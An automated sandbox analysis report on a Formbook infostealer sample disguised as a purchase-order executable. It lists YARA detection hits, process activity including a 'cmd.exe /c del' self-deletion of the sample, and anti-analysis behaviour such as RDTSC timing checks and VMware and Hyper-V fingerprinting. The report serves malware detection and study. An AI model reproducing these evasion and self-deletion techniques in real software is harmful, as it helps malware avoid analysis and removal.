          Source: PO_29_00412.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.480594324.0000000000830000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.480594324.0000000000830000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.225535038.0000000003120000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.225535038.0000000003120000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.261451958.0000000000900000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.261451958.0000000000900000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.261351613.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.261351613.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.221080798.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.221080798.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.480879219.0000000000960000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.480879219.0000000000960000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.261176274.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.261176274.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PO_29_00412.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO_29_00412.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.PO_29_00412.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.PO_29_00412.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PO_29_00412.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO_29_00412.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PO_29_00412.exe.3120000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PO_29_00412.exe.3120000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.PO_29_00412.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.PO_29_00412.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PO_29_00412.exe.3120000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PO_29_00412.exe.3120000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@14/8
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 0_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403461
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 0_2_0040473E GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040473E
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_01
          Source: C:\Users\user\Desktop\PO_29_00412.exeFile created: C:\Users\user\AppData\Local\Temp\nsw1FAA.tmpJump to behavior
          Source: PO_29_00412.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO_29_00412.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\PO_29_00412.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: PO_29_00412.exeReversingLabs: Detection: 36%
          Source: C:\Users\user\Desktop\PO_29_00412.exeFile read: C:\Users\user\Desktop\PO_29_00412.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\PO_29_00412.exe 'C:\Users\user\Desktop\PO_29_00412.exe'
          Source: C:\Users\user\Desktop\PO_29_00412.exeProcess created: C:\Users\user\Desktop\PO_29_00412.exe 'C:\Users\user\Desktop\PO_29_00412.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO_29_00412.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO_29_00412.exeProcess created: C:\Users\user\Desktop\PO_29_00412.exe 'C:\Users\user\Desktop\PO_29_00412.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO_29_00412.exe'Jump to behavior
          Source: C:\Users\user\Desktop\PO_29_00412.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: PO_29_00412.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: PO_29_00412.exe, 00000000.00000003.215175981.0000000003150000.00000004.00000001.sdmp, PO_29_00412.exe, 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, rundll32.exe, 00000007.00000002.483945483.00000000046FF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO_29_00412.exe, rundll32.exe
          Source: Binary string: rundll32.pdb source: PO_29_00412.exe, 00000001.00000002.261401303.0000000000609000.00000004.00000020.sdmp
          Source: Binary string: rundll32.pdbGCTL source: PO_29_00412.exe, 00000001.00000002.261401303.0000000000609000.00000004.00000020.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\PO_29_00412.exeUnpacked PE file: 1.2.PO_29_00412.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: PO_29_00412.exeStatic PE information: real checksum: 0x0 should be: 0x351cf
          Source: o9oo.dll.0.drStatic PE information: real checksum: 0x10190 should be: 0x20a6
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_004153DD push ebp; ret 1_2_004153E0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_0041B3F2 push eax; ret 1_2_0041B3F8
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_0041B3FB push eax; ret 1_2_0041B462
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_0041B3A5 push eax; ret 1_2_0041B3F8
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_0041B45C push eax; ret 1_2_0041B462
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00417DC3 pushad ; ret 1_2_00417DC4
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00415E10 push edi; ret 1_2_00415E31
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00414F69 push edx; ret 1_2_00414F6A
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00ABD0D1 push ecx; ret 1_2_00ABD0E4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0465D0D1 push ecx; ret 7_2_0465D0E4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0062B3F2 push eax; ret 7_2_0062B3F8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0062B3FB push eax; ret 7_2_0062B462
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006253DD push ebp; ret 7_2_006253E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0062B3A5 push eax; ret 7_2_0062B3F8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0062B45C push eax; ret 7_2_0062B462
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00627DC3 pushad ; ret 7_2_00627DC4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00625E10 push edi; ret 7_2_00625E31
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00624F69 push edx; ret 7_2_00624F6A
          Source: C:\Users\user\Desktop\PO_29_00412.exeFile created: C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp\o9oo.dllJump to dropped file
          Source: C:\Users\user\Desktop\PO_29_00412.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\PO_29_00412.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO_29_00412.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000006185E4 second address: 00000000006185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 000000000061896E second address: 0000000000618974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO_29_00412.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_004088A0 rdtsc 1_2_004088A0
          Source: C:\Windows\explorer.exe TID: 5232Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 0_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004059F0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 0_2_0040659C FindFirstFileA,FindClose,0_2_0040659C
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
          Source: C:\Users\user\Desktop\PO_29_00412.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Users\user\Desktop\PO_29_00412.exeFile opened: C:\Users\user\AppData\Local\Temp\nsw1FAB.tmpJump to behavior
          Source: C:\Users\user\Desktop\PO_29_00412.exeFile opened: C:\Users\user\Desktop\PO_29_00412.exeJump to behavior
          Source: C:\Users\user\Desktop\PO_29_00412.exeFile opened: C:\Users\user\AppData\Local\Temp\d4kvs9nrjol318Jump to behavior
          Source: C:\Users\user\Desktop\PO_29_00412.exeFile opened: C:\Users\user\AppData\Local\Temp\9o96oivnhyxfeg7Jump to behavior
          Source: C:\Users\user\Desktop\PO_29_00412.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: explorer.exe, 00000004.00000000.240711887.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.240711887.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000004.00000000.241197371.00000000089FE000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.240588055.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.240247684.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.240711887.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000004.00000002.495185558.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000004.00000000.240711887.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000004.00000000.240711887.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.240773305.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000004.00000002.495225216.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000004.00000000.240247684.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.240247684.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.240247684.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\PO_29_00412.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\PO_29_00412.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_004088A0 rdtsc 1_2_004088A0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00409B10 LdrLoadDll,1_2_00409B10
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 0_2_0311185E mov eax, dword ptr fs:[00000030h]0_2_0311185E
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 0_2_03111646 mov eax, dword ptr fs:[00000030h]0_2_03111646
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA90AF mov eax, dword ptr fs:[00000030h]1_2_00AA90AF
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]1_2_00A920A0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]1_2_00A920A0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]1_2_00A920A0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]1_2_00A920A0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]1_2_00A920A0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]1_2_00A920A0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A9F0BF mov ecx, dword ptr fs:[00000030h]1_2_00A9F0BF
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A9F0BF mov eax, dword ptr fs:[00000030h]1_2_00A9F0BF
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A9F0BF mov eax, dword ptr fs:[00000030h]1_2_00A9F0BF
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A69080 mov eax, dword ptr fs:[00000030h]1_2_00A69080
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE3884 mov eax, dword ptr fs:[00000030h]1_2_00AE3884
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE3884 mov eax, dword ptr fs:[00000030h]1_2_00AE3884
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A640E1 mov eax, dword ptr fs:[00000030h]1_2_00A640E1
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A640E1 mov eax, dword ptr fs:[00000030h]1_2_00A640E1
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A640E1 mov eax, dword ptr fs:[00000030h]1_2_00A640E1
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A658EC mov eax, dword ptr fs:[00000030h]1_2_00A658EC
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AFB8D0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AFB8D0 mov ecx, dword ptr fs:[00000030h]1_2_00AFB8D0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AFB8D0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AFB8D0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AFB8D0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AFB8D0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A9002D mov eax, dword ptr fs:[00000030h]1_2_00A9002D
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A9002D mov eax, dword ptr fs:[00000030h]1_2_00A9002D
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A9002D mov eax, dword ptr fs:[00000030h]1_2_00A9002D
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A9002D mov eax, dword ptr fs:[00000030h]1_2_00A9002D
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A9002D mov eax, dword ptr fs:[00000030h]1_2_00A9002D
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A7B02A mov eax, dword ptr fs:[00000030h]1_2_00A7B02A
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A7B02A mov eax, dword ptr fs:[00000030h]1_2_00A7B02A
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A7B02A mov eax, dword ptr fs:[00000030h]1_2_00A7B02A
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A7B02A mov eax, dword ptr fs:[00000030h]1_2_00A7B02A
